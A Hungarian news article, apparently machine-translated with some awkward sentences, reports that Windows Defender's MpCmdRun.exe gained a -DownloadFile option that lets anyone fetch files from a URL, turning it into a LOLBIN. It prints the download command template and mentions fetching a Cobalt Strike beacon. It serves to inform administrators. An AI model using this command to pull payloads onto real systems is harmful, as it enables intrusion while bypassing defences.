A Windows Defender veszélyes alkalmazássá válik az adminok számára

A Windows 10 operációs rendszerben található Windows Defender az első védelmi vonal rosszindulatú programok elleni támadások esetén, és a nagyon jó munka is.

Az egyik új frissítés során azonban a hatalmas víruskereső új DownloadFile parancsot kapott, amely lehetővé teszi, hogy bárki letölthessen bármilyen fájlt egy URL-ről a számítógép egy bizonyos elérési útjára.

Ezt kihasználásnak nevezhetjük, mivel akár rosszindulatú programok letöltésére is használható, amit Mohammad Askar biztonsági kutató fedezett fel, aki kiküldve lelete a Twitteren.

Hogyan lehet a Windows Defender felhasználásával letölteni a rosszindulatú programokat?

Nagyon egyszerű a Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) segítségével bármilyen fájlt külső forrásból letölteni a számítógépre.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

Próbálkozásában Askar le tudta tölteni a Cobalt Strike jelzőt, egy jól ismert támadó eszközt ezzel a parancssorral.

Az új parancs szerepel a verzióban 4.18.2007.8-0 és újabb, ami nagyon jó kezdési időt biztosít a támadók számára.

Alapvetően ez a funkció megfordul Windows Defender egy ártalmatlan rendszerfájlba, amelyet rosszindulatú célokra lehet használni, egy LOLBIN-ba (a soros bináris fájlokból élve).

Szerencsére a káros fájl letöltése után ugyanaz a Windows Defender vagy egy másik fogja észlelni víruskereső szoftver ha jelen van.

Megbízható védelmi szoftverből a Windows Defender újabb lehetséges fenyegetéssé vált, amelyet az adminisztrátoroknak és a biztonsági szakértőknek szorosan figyelemmel kell kísérniük.

Ha bármilyen javaslata vagy észrevétele van, kérjük, hagyja alább a Megjegyzések részben.